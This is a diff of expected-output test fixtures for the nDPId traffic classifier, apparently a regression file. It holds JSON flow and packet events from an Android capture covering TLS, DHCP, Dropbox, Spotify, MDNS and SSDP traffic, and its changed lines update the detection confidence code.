00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":112,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":112,"pkt_l4_len":78,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBiArsAAC4GBN0R+LBLwKgCEQG7xZQAd+\/fhij6wYAYBTCNMgAAAQEIClsVzl8R3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8Q=="} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454780612,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":46,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":46,"midstream":1,"thread_ts_msec":1582454780612,"l3_proto":"ip4","src_ip":"17.248.176.75","dst_ip":"192.168.2.17","src_port":443,"dst_port":50580,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1582454780612,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454780612,"pkt":"xGGLNYKpxiwDYGpkCABFAgBTArwAAC4GBOsR+LBLwKgCEQG7xZQAd\/ANhij6wYAZBTCw2QAAAQEIClsVzl8R3+\/bFQMDABoAAAAAAAAACeuqoxCRLc0dnl7lMGJ\/SkF\/RQ=="} 00574{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"android.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1582454780907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1582454780907,"pkt":"xGGLNYKpxiwDYGpkCABFAACBAr0AAC4GBL4R+LBLwKgCEQG7xZQAd+\/fhij6wYAZBTC0SwAAAQEIClsVz4YR3+\/bFwMDACkAAAAAAAAACH\/oI1Kw++l3rtTYoEdnoXbMNGznM5xRQS6qcOaP89cv8RUDAwAaAAAAAAAAAAnrqqMQkS3NHZ5e5TBif0pBf0U="} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1582454784313,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454784313,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDQAAP8RQnEAAAAA\/\/\/\/\/wBEAEMBNI1GAQEGAHhURwsAAAAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 
+00732{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454784313,"flow_last_seen":1582454784313,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454784313,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1582454786281,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454786281,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDUAAP8RQnAAAAAA\/\/\/\/\/wBEAEMBNI1EAQEGAHhURwsAAgAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAgBThkMAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AYBDV85QAAAQEIChoMpyQR4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} -00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 
+00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454787658,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1582454787658,"l3_proto":"ip4","src_ip":"17.248.185.10","dst_ip":"192.168.2.17","src_port":443,"dst_port":50702,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1582454787658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454787658,"pkt":"xGGLNYKpxiwDYGpkCABFAAA0hkQAADAGdsQR+LkKwKgCEQG7xg7EYLKItSIfH4ARBDUyJQAAAQEIChoMpyQR4cyf"} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"android.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1582454788086,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1582454788086,"pkt":"xGGLNYKpxiwDYGpkCABFAABThkUAADAGdqQR+LkKwKgCEQG7xg7EYLJptSIfH4AZBDV7OQAAAQEIChoMqM8R4cyfFQMDABoAAAAAAAAAArlWa60ADWOMgYlfYrlhFGv+Kg=="} 
00849{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"android.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1582454789207,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454789207,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIeDYAAP8RQm8AAAAA\/\/\/\/\/wBEAEMBNI1BAQEGAHhURwsABQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1582454792980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454792980,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIangkAAEARVHnAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454792980,"flow_last_seen":1582454792980,"flow_idle_time":200000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1582454792980,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1582454796360,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454796360,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIV+oAAEARnGrAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 
-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454796360,"flow_last_seen":1582454796360,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454796360,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
01125{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1582454823029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454823029,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIavtMAAEARM6\/AqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1582454823653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1582454823653,"pkt":"AQBeAAD72DBiVgAcCABFAABJmVsAAP8RtXWp\/uHY4AAA+xTpFOkANUGgAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} +00688{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"android.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1582454823653,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":87,"pkt_l4_len":53,"thread_ts_msec":1582454823653,"pkt":"AQBeAAD7xiwDYGpkCABFAABJ7RwAAAERKOPAqAIB4AAA+xTpFOkANQrOAAAAAAABAAAAAAAAEF9zcG90aWZ5LWNvbm5lY3QEX3RjcAVsb2NhbAAADAAB"} -00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 
+00684{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":44,"source":"android.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454823653,"flow_last_seen":1582454823653,"flow_idle_time":200000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":45,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454823653,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_spotify-connect._tcp.local"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1582454825628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454825628,"pkt":"AQBef\/\/62DBiVgAcCABFAACa4oMAAP8RXP2p\/uHY7\/\/\/+ux6B2wAhmGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} 
-00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 